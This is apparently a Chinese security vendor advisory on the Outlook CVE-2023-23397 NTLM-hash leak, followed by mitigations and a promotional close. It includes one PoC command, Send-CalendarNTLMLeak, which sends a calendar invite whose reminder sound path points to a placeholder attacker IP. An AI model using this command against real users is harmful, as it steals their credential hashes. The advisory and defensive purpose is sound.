前言

安盟信息實(shí)驗(yàn)室安全研究員最近發(fā)現(xiàn)CVE-2023-23397(outlook漏洞)在野利用，由于outlook在企業(yè)中廣泛使用，護(hù)網(wǎng)在即，為避免漏洞利用造成的危害，他們復(fù)現(xiàn)了該漏洞。

漏洞描述

Microsoft Office Outlook是微軟辦公軟件套裝的組件之一，可以用來收發(fā)電子郵件、管理聯(lián)系人信息、安排日程等功能。

CVE-2023-23397是Microsoft Outlook欺騙漏洞，可導(dǎo)致身份驗(yàn)證繞過，未經(jīng)身份驗(yàn)證的攻擊者可以通過向受影響的系統(tǒng)發(fā)送特制電子郵件來利用該漏洞獲取用戶的Net-NTLMv2哈希。

漏洞原理

攻擊者向受害者發(fā)送一條帶有MAPI（Messaging Application Programming Interface）屬性的消息，其中UNC路徑為攻擊者控制的服務(wù)器上的SMB（TCP 445端口）。攻擊者發(fā)送帶有惡意日歷邀請(qǐng)的郵件，來使“PidLidReminderFileParameter”（提醒的自定義警報(bào)聲音選項(xiàng)）觸發(fā)易受攻擊的 API 端點(diǎn) PlayReminderSound。部分Poc代碼如下：

漏洞利用

Send-CalendarNTLMLeak -recipient "收件郵箱地址XXXX@XX.COM" -remotefilepath "\\攻擊機(jī)IP\d.wav" -meetingsubject "會(huì)議主題" -meetingbody "會(huì)議內(nèi)容"

觸發(fā)UNC_PATH成功抓到HASH：

緩解措施

1.立即應(yīng)用供應(yīng)商補(bǔ)丁。微軟發(fā)布了一個(gè)補(bǔ)丁，作為其 2023 年 3 月月度安全更新的一部分。

2.阻止 TCP 445/SMB 從您的網(wǎng)絡(luò)出站。這將阻止將 NTLM 身份驗(yàn)證消息發(fā)送到遠(yuǎn)程文件共享。如果無法做到這一點(diǎn)，我們建議監(jiān)控通過端口 445 的出站流量以查找未知的外部 IP 地址，然后識(shí)別并阻止它們。

3.客戶可以禁用 WebClient 服務(wù)。請(qǐng)注意，這將阻止所有 WebDAV 連接，包括內(nèi)聯(lián)網(wǎng)。

4.將用戶添加到受保護(hù)的用戶安全組。這會(huì)阻止使用 NTLM 作為身份驗(yàn)證機(jī)制，但請(qǐng)注意，這可能會(huì)影響在您的環(huán)境中依賴 NTLM 的應(yīng)用程序。

5.在客戶端和服務(wù)器上強(qiáng)制執(zhí)行 SMB 簽名以防止中繼攻擊。

其他研究人員指出，禁用Outlook 中的“顯示提醒”設(shè)置可以防止 NTLM 憑據(jù)泄露。

安盟信息依托豐富的實(shí)踐經(jīng)驗(yàn)與雄厚技術(shù)研發(fā)實(shí)力，積極發(fā)揮自身檢測(cè)預(yù)警的優(yōu)勢(shì)，全面掌握漏洞動(dòng)態(tài)，為各行業(yè)客戶提供全方位的網(wǎng)絡(luò)安全解決方案，快速提升客戶整體網(wǎng)絡(luò)安全性，如有漏洞檢測(cè)與應(yīng)急需求，請(qǐng)及時(shí)聯(lián)系我們。安盟信息靈犀實(shí)驗(yàn)室可以提供完整的解決方案與檢測(cè)腳本，全方位為您保駕護(hù)航！